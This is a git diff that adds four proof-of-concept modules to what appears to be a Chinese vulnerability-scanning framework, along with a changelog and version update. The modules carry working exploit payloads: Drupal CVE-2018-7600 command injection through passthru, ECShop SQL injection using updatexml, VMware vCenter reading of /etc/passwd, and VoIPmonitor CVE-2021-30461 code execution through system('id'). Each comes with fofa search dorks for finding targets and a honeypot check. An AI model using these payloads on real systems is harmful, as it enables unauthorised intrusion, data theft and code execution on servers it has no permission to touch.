diff --git a/docs/CHANGELOG.md b/docs/CHANGELOG.md index 7cc7947..b10ea47 100644 --- a/docs/CHANGELOG.md +++ b/docs/CHANGELOG.md @@ -716,6 +716,15 @@ * ``通达OA 计算机名探测插件`` * ``通达OA 版本探测插件`` + +## version 2.23.7 +------------------ +> 新增POC: +* ``Drupal!远程代码执行(CVE-2018-7600)`` +* ``ECShop 4.1.0前台 delete_cart_goods.php SQL注入(CNVD-2020-58823)`` +* ``Vmware vCenter 任意文件读取`` +* ``VoIPmonitor 未授权远程代码执行(CVE-2021-30461)`` + ``` =============== |以上为当前版本| diff --git a/info.ini b/info.ini index 44e3a46..bcf2bbd 100644 --- a/info.ini +++ b/info.ini @@ -1,6 +1,6 @@ [info] -version = 2.23.3 +version = 2.23.7 author = "openx" diff --git a/poc/Drupal!/RCE_CVE_2018_7600/poc.py b/poc/Drupal!/RCE_CVE_2018_7600/poc.py new file mode 100644 index 0000000..2c523b1 --- /dev/null +++ b/poc/Drupal!/RCE_CVE_2018_7600/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Drupal!远程代码执行(CVE-2018-7600)", # 漏洞名称 + "VulnID" : "CVE-2018-7600", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url0 = self.target + "/exphub.txt" + url = self.target + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" # url自己按需调整 + data = 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=passthru&mail[#type]=markup&mail[#markup]=ls' + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False) + if "example.gitignore" in req.text and req.status_code == 200 : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/ECShop/SQLi_delete_cart_goods/poc.py b/poc/ECShop/SQLi_delete_cart_goods/poc.py new file mode 100644 index 0000000..be2e634 --- /dev/null +++ b/poc/ECShop/SQLi_delete_cart_goods/poc.py @@ -0,0 +1,73 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "2", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + v1 : 略 + v2 : 小改进 + """, # POC描述,写更新描述,没有就不写 + + "name" : "ECShop 4.1.0前台 delete_cart_goods.php SQL注入(CNVD-2020-58823)", # 漏洞名称 + "VulnID" : "CNVD-2020-58823", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "ECShop", # 漏洞应用名称 + "AppVersion" : "ecshop4.1.0及以下", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":""" + app="ECShop" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/delete_cart_goods.php" # url自己按需调整 + data = "id=0||(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "MySQL server error report" in req.text:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/VMware/File_read_vCenter/poc.py b/poc/VMware/File_read_vCenter/poc.py new file mode 100644 index 0000000..2dd4547 --- /dev/null +++ b/poc/VMware/File_read_vCenter/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Vmware vCenter 任意文件读取", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "VMware vCenter Server", # 漏洞应用名称 + "AppVersion" : "VMware vCenter Server 6.5.0a- f 版本", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件 + """, # 漏洞简要描述 + + "fofa-dork":""" + title="ID_VC_Welcome" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/eam/vib?id=/etc/passwd" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "root:/root" in req.text and req.status_code == 200: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/VoIPmonitor/RCE_CVE_2021_30461/poc.py b/poc/VoIPmonitor/RCE_CVE_2021_30461/poc.py new file mode 100644 index 0000000..35095bf --- /dev/null +++ b/poc/VoIPmonitor/RCE_CVE_2021_30461/poc.py @@ -0,0 +1,77 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +import re +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "2", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + v1 : 略 + v2 : 改成了正则匹配的模式,有效降低了误报率 + """, # POC描述,写更新描述,没有就不写 + + "name" : "VoIPmonitor 未授权远程代码执行(CVE-2021-30461)", # 漏洞名称 + "VulnID" : "CVE-2021-30461", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "VoIPmonitor", # 漏洞应用名称 + "AppVersion" : "VoIPmonitor < 24.60", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + VoIPmonitor 是开源网络数据包嗅探器,具有商业前端,用于在 linux 上运行的 SIP RTP RTCP SKINNY(SCCP) MGCP WebRTC VoIP 协议。 + VoIPmonitor的index.php文件中接受未授权用户提交的未经验证的参数值并将之写进了配置文件中,该配置文件在index.php代码下文中被require_once函数包含,从而导致任意代码执行 + """, # 漏洞简要描述 + + "fofa-dork":""" + title="VoIPmonitor" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/index.php" # url自己按需调整 + + data = """SPOOLDIR=test".system("id")."&recheck=annen""" + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False) + result = re.search("uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip()) + if result and req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file